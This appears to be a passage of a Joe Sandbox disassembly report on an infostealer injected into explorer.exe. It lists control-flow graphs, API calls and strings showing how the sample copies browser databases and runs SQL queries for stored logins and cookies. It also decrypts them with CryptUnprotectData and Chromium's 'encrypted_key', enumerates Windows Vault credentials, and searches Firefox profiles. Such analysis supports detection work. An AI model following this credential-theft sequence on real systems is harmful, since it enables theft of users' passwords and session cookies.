28812->28780 28815 279a67c 28812->28815 28813->28812 28853 279a1c6 18 API calls 28813->28853 28816 279a6c1 28815->28816 28817 279a694 _alldiv _allmul 28815->28817 28854 279a33b SetFilePointer 28816->28854 28817->28816 28820 279a6f0 SetEndOfFile 28821 279a6d4 28820->28821 28823 279a6ee 28820->28823 28821->28823 28858 279a1c6 18 API calls 28821->28858 28823->28779 28823->28780 28825 27e307c 17 API calls 28824->28825 28826 2796a65 28825->28826 28826->28789 28828 2796a81 memset 28827->28828 28829 279af01 28828->28829 28830 2796a81 memset 28829->28830 28837 279af07 28829->28837 28831 279af2a 28830->28831 28831->28837 28860 2797f07 28831->28860 28833 27e52ae _allmul 28835 279afd9 28833->28835 28834 279af54 28834->28833 28834->28837 28836 279b87b 21 API calls 28835->28836 28838 279affa 28836->28838 28837->28773 28839 279b020 28838->28839 28840 279b000 28838->28840 28841 279ae65 22 API calls 28839->28841 28868 279a1c6 18 API calls 28840->28868 28843 279b01c 28841->28843 28843->28837 28863 279adcc 28843->28863 28846 279ae7a 28845->28846 28847 279a67c 22 API calls 28846->28847 28848 279ae83 28846->28848 28849 279aea5 28847->28849 28848->28775 28849->28848 28875 279a1c6 18 API calls 28849->28875 28851->28778 28852->28778 28853->28812 28855 279a36a 28854->28855 28857 279a390 28854->28857 28855->28857 28859 279a1c6 18 API calls 28855->28859 28857->28820 28857->28821 28858->28823 28859->28857 28869 2797ec7 28860->28869 28865 279ade4 28863->28865 28864 279ae5f 28864->28837 28865->28864 28867 279bafc 20 API calls 28865->28867 28874 279a39e 18 API calls 28865->28874 28867->28865 28868->28843 28870 2797ed9 28869->28870 28871 2797ed4 28869->28871 28873 2796e6a 17 API calls 28870->28873 28871->28834 28873->28871 28874->28865 28875->28848 28876->28803 28877->28803 29156 27acb91 18 API calls 29274 27afd97 19 API calls 29157 27b13ca 103 API calls 29275 27b7d8b _allrem memcpy 29160 27aab8b 19 API calls

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 2793717-2793730 call 2791b6a 3 2793c37-2793c3d 0->3 4 2793736-279374c 0->4 5 279374e-279375e call 279302d 4->5 6 2793762-279379c call 2791000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 4->6 5->6 11 27937a8-27937b5 call 27e4bec 6->11 12 279379e-27937a3 call 279349b 6->12 16 27937bb-27937d3 call 27ceeb8 11->16 17 2793c15-2793c1e DeleteFileW call 2791011 11->17 12->11 22 27937d9-27937f1 call 2791000 call 27b02ec 16->22 23 2793c0c-2793c10 call 27e3848 16->23 21 2793c23-2793c28 17->21 21->3 24 2793c2a-2793c32 call 2792ffa 21->24 31 2793bd0-2793be3 call 27afb92 lstrlen 22->31 32 27937f7 22->32 23->17 24->3 37 2793c05-2793c07 call 2791011 31->37 38 2793be5-2793c00 call 2791798 * 3 31->38 34 27937fc-2793816 call 2791fa7 32->34 41 279381c-279382d 34->41 42 2793bb6-2793bc6 call 27b02ec 34->42 37->23 38->37 46 2793833-2793843 RtlCompareMemory 41->46 47 2793a37-2793a51 CryptUnprotectData 41->47 42->34 52 2793bcc 42->52 46->47 51 2793849-279384b 46->51 47->42 49 2793a57-2793a5c 47->49 49->42 53 2793a62-2793a78 call 2791fa7 49->53 51->47 55 2793851-2793856 51->55 52->31 62 2793a7a-2793a80 53->62 63 2793a86-2793a9d call 2791fa7 53->63 55->47 58 279385c-2793861 55->58 58->47 59 2793867-27938ed RtlZeroMemory call 2791000 58->59 73 2793a2e-2793a32 59->73 74 27938f3-2793909 call 2791fa7 59->74 62->63 66 2793a82 62->66 68 2793aab-2793ac2 call 2791fa7 63->68 69 2793a9f-2793aa5 63->69 66->63 78 2793ad0-2793aed call 2791fa7 68->78 79 2793ac4-2793aca 68->79 69->68 71 2793aa7 69->71 71->68 77 2793bb1 call 2791011 73->77 83 279390b-2793911 74->83 84 2793917-279392d call 2791fa7 74->84 77->42 90 2793aef-2793af1 78->90 91 2793af7-2793b01 78->91 79->78 82 2793acc 79->82 82->78 83->84 86 2793913 83->86 92 279393b-2793952 call 2791fa7 84->92 93 279392f-2793935 84->93 86->84 90->91 94 2793af3 90->94 95 2793b0f-2793b1b lstrlen 91->95 96 2793b03-2793b05 91->96 103 2793960-2793979 call 2791fa7 92->103 104 2793954-279395a 92->104 93->92 100 2793937 93->100 94->91 95->42 99 2793b21-2793b2a lstrlen 95->99 96->95 98 2793b07-2793b0b 96->98 98->95 99->42 102 2793b30-2793b4f call 2791000 99->102 100->92 110 2793b59-2793b93 call 2792112 wsprintfA lstrlen 102->110 111 2793b51 102->111 112 279397b-2793981 103->112 113 2793987-2793993 lstrlen 103->113 104->103 106 279395c 104->106 106->103 118 2793ba3-2793baf lstrcat 110->118 119 2793b95-2793ba1 call 279102f 110->119 111->110 112->113 115 2793983 112->115 113->73 117 2793999-27939a2 lstrlen 113->117 115->113 117->73 120 27939a8-27939c7 call 2791000 117->120 118->77 119->118 125 27939c9 120->125 126 27939d1-2793a0b call 2792112 wsprintfA lstrlen 120->126 125->126 129 2793a1b-2793a29 lstrcat call 2791011 126->129 130 2793a0d-2793a19 call 279102f 126->130 129->73 130->129
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 02793778
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02793782
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 02793789
                                                                                                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02793794
                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0279383B
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000040), ref: 02793870
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?), ref: 0279398B
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0279399A
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 027939F1
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 027939FD
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02793A21
                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02793A49
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02793B13
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02793B22
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02793B79
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02793B85
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02793BA9
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02793BDA
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02793C16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                                                                              • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                                                                                              • API String ID: 584740257-404540950
                                                                                                                                                                                                              • Opcode ID: d95f6ebb70097ef85f5dda044b72c21990e7fafe1f99ea41c9814e8a4ccd6022
                                                                                                                                                                                                              • Instruction ID: f4edbed3c3fa33ebb825049afefb2175548b4ed9c0e026c977d0d6e7918a1e6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d95f6ebb70097ef85f5dda044b72c21990e7fafe1f99ea41c9814e8a4ccd6022
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52E18F716083429FDB16DF24E884F2FBBEAEF89758F04886CF59596250DB35C805CB62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 134 2792198-27921c9 RtlZeroMemory GetVersionExW 135 27921cb-27921d0 134->135 136 27921d7-27921dc 134->136 137 27921de 135->137 138 27921d2 135->138 136->137 139 27921e3-27921f6 LoadLibraryW 136->139 137->139 138->136 140 279249b-27924a3 139->140 141 27921fc-279223e GetProcAddress * 5 139->141 142 2792492-279249a FreeLibrary 141->142 143 2792244-279224a 141->143 142->140 143->142 144 2792250-2792252 143->144 144->142 145 2792258-279225a 144->145 145->142 146 2792260-2792265 145->146 146->142 147 279226b-2792277 146->147 148 279227e-2792280 147->148 148->142 149 2792286-27922a5 148->149 151 279248b-279248f 149->151 152 27922ab-27922b3 149->152 151->142 153 27922b9-27922c5 152->153 154 2792483 152->154 155 27922c9-27922db 153->155 154->151 156 27922e1-27922f1 RtlCompareMemory 155->156 157 2792365-2792375 RtlCompareMemory 155->157 159 2792452-2792475 156->159 160 27922f7-2792348 call 2791953 * 3 156->160 158 279237b-27923c9 call 2791953 * 3 157->158 157->159 176 27923cb-27923dc call 2791953 158->176 177 27923e4-27923ea 158->177 159->155 163 279247b-279247f 159->163 160->177 178 279234e-2792363 call 2791953 160->178 163->154 190 27923e0 176->190 180 27923ec-27923ee 177->180 181 2792431-2792433 177->181 178->190 186 279242a-279242c call 2791011 180->186 187 27923f0-27923f2 180->187 183 279243c-279243e 181->183 184 2792435-2792437 call 2791011 181->184 191 2792440-2792442 call 2791011 183->191 192 2792447-2792449 183->192 184->183 186->181 187->186 193 27923f4-27923f6 187->193 190->177 191->192 192->159 197 279244b-279244d call 2791011 192->197 193->186 196 27923f8-2792406 StrStrIW 193->196 198 2792408-2792421 call 27917c0 * 3 196->198 199 2792426 196->199 197->159 198->199 199->186
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000114), ref: 027921AF
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 027921BE
                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 027921E8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0279220A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02792214
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02792220
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0279222A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02792236
                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(?,027F1110,00000010), ref: 027922E8
                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(?,027F1110,00000010), ref: 0279236C
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 027923FE
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 02792493
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                                                                                              • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                                                                              • API String ID: 2583887280-2831467701
                                                                                                                                                                                                              • Opcode ID: b6062a6e8786bd2df0c05f9c66f5952daf04c918a28752a95a9f884e2bff72fc
                                                                                                                                                                                                              • Instruction ID: b717e439f1dd227b8c225e32b4d4f7a26018c252c0a42a32ce1d4c7d043be54e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6062a6e8786bd2df0c05f9c66f5952daf04c918a28752a95a9f884e2bff72fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB919E71A08341AFDB14EF65D844A2FBBEABFD9704F40482DF98697261EB71D801CB52

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 261 2793098-27930b1 call 2791b6a 264 27933ba-27933c0 261->264 265 27930b7-27930cd 261->265 266 27930cf-27930d8 call 279302d 265->266 267 27930e3-2793128 call 2791000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 27e4bec 265->267 270 27930dd-27930df 266->270 274 279339b-27933a4 DeleteFileW call 2791011 267->274 275 279312e-2793146 call 27ceeb8 267->275 270->267 279 27933a9-27933ab 274->279 280 279314c-2793158 call 27b02ec 275->280 281 2793392-2793396 call 27e3848 275->281 279->264 282 27933ad-27933b5 call 2792ffa 279->282 287 2793389-279338d call 27afb92 280->287 288 279315e-2793161 280->288 281->274 282->264 287->281 290 2793165-279317f call 2791fa7 288->290 293 279336f-279337b call 27b02ec 290->293 294 2793185-2793196 290->294 293->290 301 2793381-2793385 293->301 295 27932cd-27932e7 CryptUnprotectData 294->295 296 279319c-27931ac RtlCompareMemory 294->296 295->293 299 27932ed-27932f2 295->299 296->295 300 27931b2-27931b4 296->300 299->293 302 27932f4-279330a call 2791fa7 299->302 300->295 303 27931ba-27931bf 300->303 301->287 309 2793318-279332f call 2791fa7 302->309 310 279330c-2793312 302->310 303->295 305 27931c5-27931ca 303->305 305->295 307 27931d0-2793253 RtlZeroMemory call 2791000 305->307 318 27932bd 307->318 319 2793255-279326b call 2791fa7 307->319 316 279333d-2793343 309->316 317 2793331-2793337 309->317 310->309 313 2793314 310->313 313->309 321 2793351-279336a call 2791798 * 3 316->321 322 2793345-279334b 316->322 317->316 320 2793339 317->320 324 27932c1-27932c8 call 2791011 318->324 330 2793279-279328e call 2791fa7 319->330 331 279326d-2793273 319->331 320->316 321->293 322->321 325 279334d 322->325 324->293 325->321 339 279329c-27932bb call 2791798 * 3 330->339 340 2793290-2793296 330->340 331->330 334 2793275 331->334 334->330 339->324 340->339 341 2793298 340->341 341->339
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 027930F9
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02793103
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 0279310A
                                                                                                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02793115
                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 027931A4
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000040), ref: 027931D7
                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 027932DF
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0279339C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                                                                              • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                                                                                              • API String ID: 2757140130-4052020286
                                                                                                                                                                                                              • Opcode ID: 6e4598cd0e3a7ddd40b338b26a2acad1bc6f9b6dbb336abd791b76997d5c65c4
                                                                                                                                                                                                              • Instruction ID: 9d1f1040ad2cf95a349c35f8f017869b474ee6e2b03000fedce5898c6ee0e6d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e4598cd0e3a7ddd40b338b26a2acad1bc6f9b6dbb336abd791b76997d5c65c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E91AC71608342ABDB11DF24E848F7FBBEAAFC9748F44496CF48996250DB35D804CB22

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02793F0A
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02793F16
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,027E62CC), ref: 02793F38
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,027E62D0), ref: 02793F4C
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02793F69
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,Local State), ref: 02793F7E
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02793F9B
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02793FB5
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02793FC4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                                                                                              • String ID: *.*$Local State
                                                                                                                                                                                                              • API String ID: 3923353463-3324723383
                                                                                                                                                                                                              • Opcode ID: 422178384343868caa283198a56d7fdfcabf565dff4d2166b3df8a3767254023
                                                                                                                                                                                                              • Instruction ID: 8988df34ebae4ea4267a0183cfd436a75afd31cae9828a0be9058a072bbc83f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422178384343868caa283198a56d7fdfcabf565dff4d2166b3df8a3767254023
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B521D330640305ABEF11B634AC0CF3B777EDB9A715F044969F817CA180EB7598188771

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 02792B3D
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,027E62CC), ref: 02792B63
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,027E62D0), ref: 02792B7B
                                                                                                                                                                                                                • Part of subcall function 027919B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02792CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027919C4
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,logins.json), ref: 02792BE7
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02792C16
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02792C43
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02792C52
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                                                                                              • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                                                                                              • API String ID: 1108783765-3717368146
                                                                                                                                                                                                              • Opcode ID: 5163255bf08b01f2787ed51ab6ef09c255a67b50a20ce4aa8ae671cb9a6664b8
                                                                                                                                                                                                              • Instruction ID: c427b6149df8457c0a9a30276191b294926454f90bb12e54c24b0791076f6a5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5163255bf08b01f2787ed51ab6ef09c255a67b50a20ce4aa8ae671cb9a6664b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31E630704352ABDF06FB307858A3F33DFAB88714B44492CED4AD7242EB39C9119A61

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 531 2791d4a-2791d5c 532 2791d62-2791d66 531->532 533 2791eb4-2791ebe 531->533 532->533 534 2791d6c-2791d77 call 27919b4 532->534 537 2791d79-2791d89 call 2791953 534->537 538 2791d8b-2791d97 call 2791953 534->538 543 2791d9b-2791d9d 537->543 538->543 543->533 544 2791da3-2791db4 FindFirstFileW 543->544 545 2791dba 544->545 546 2791ead-2791eaf call 2791011 544->546 548 2791dbe-2791dc3 545->548 546->533 549 2791e3d-2791e6a call 2791953 call 279199d lstrcmpiW 548->549 550 2791dc5-2791dd7 lstrcmpiW 548->550 561 2791e6c-2791e75 call 2791cf7 549->561 562 2791e87-2791e89 call 2791011 549->562 552 2791ddd-2791def lstrcmpiW 550->552 553 2791e8e-2791e9c FindNextFileW 550->553 552->553 556 2791df5-2791e00 call 27919b4 552->556 553->548 554 2791ea2-2791ea9 FindClose 553->554 554->546 563 2791e09 556->563 564 2791e02-2791e07 556->564 561->562 570 2791e77-2791e7f 561->570 562->553 566 2791e0b-2791e3b call 2791953 call 279199d call 2791d4a 563->566 564->566 566->562 570->562
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 027919B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02792CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027919C4
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02791DA9
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,027E62CC), ref: 02791DCF
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,027E62D0), ref: 02791DE7
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 02791E62
                                                                                                                                                                                                                • Part of subcall function 02791CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02792C27), ref: 02791D02
                                                                                                                                                                                                                • Part of subcall function 02791CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02791D0D
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02791E94
                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02791EA3
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                                                                                              • String ID: *.*$\*.*
                                                                                                                                                                                                              • API String ID: 232625764-1692270452
                                                                                                                                                                                                              • Opcode ID: 5060d39a677e1aa79d00479d16f0a010a1319908bc5359ce03be722e546d829c
                                                                                                                                                                                                              • Instruction ID: 4faf6305cbbacb0350ef63ea8c21ca6ececc6fd177f5665a701c2fd9f4e32d20
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5060d39a677e1aa79d00479d16f0a010a1319908bc5359ce03be722e546d829c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5631BA307043439BDF11EB35A888A7F77EE9FD8751F444A29E94E87240EB75C825C661

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 641 2793e04-2793e11 call 2791b6a 644 2793ed4-2793ed8 641->644 645 2793e17-2793e22 call 2791c31 641->645 645->644 648 2793e28-2793e34 call 2792fb1 645->648 651 2793ec8-2793ecc 648->651 652 2793e3a-2793e4f call 279123b 648->652 651->644 655 2793e51-2793e58 652->655 656 2793ec0-2793ec7 call 2791011 652->656 658 2793e5a-2793e6a 655->658 659 2793ebf 655->659 656->651 661 2793eb8-2793eba call 2791011 658->661 662 2793e6c-2793e7c RtlCompareMemory 658->662 659->656 661->659 662->661 664 2793e7e-2793ea6 CryptUnprotectData 662->664 664->661 665 2793ea8-2793ead 664->665 665->661 666 2793eaf-2793eb3 665->666 666->661
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F
                                                                                                                                                                                                                • Part of subcall function 02791C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02793E1E,00000000,?,02793FA8), ref: 02791C46
                                                                                                                                                                                                                • Part of subcall function 02791C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02793FA8), ref: 02791C56
                                                                                                                                                                                                                • Part of subcall function 02791C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02793FA8), ref: 02791C76
                                                                                                                                                                                                                • Part of subcall function 02791C31: CloseHandle.KERNEL32(00000000,?,02793FA8), ref: 02791C91
                                                                                                                                                                                                                • Part of subcall function 02792FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02793E30,00000000,00000000,?,02793FA8), ref: 02792FC1
                                                                                                                                                                                                                • Part of subcall function 02792FB1: lstrlen.KERNEL32("encrypted_key":",?,02793FA8), ref: 02792FCE
                                                                                                                                                                                                                • Part of subcall function 02792FB1: StrStrIA.SHLWAPI("encrypted_key":",027E692C,?,02793FA8), ref: 02792FDD
                                                                                                                                                                                                                • Part of subcall function 0279123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02793E4B,00000000), ref: 0279124A
                                                                                                                                                                                                                • Part of subcall function 0279123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791268
                                                                                                                                                                                                                • Part of subcall function 0279123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791295
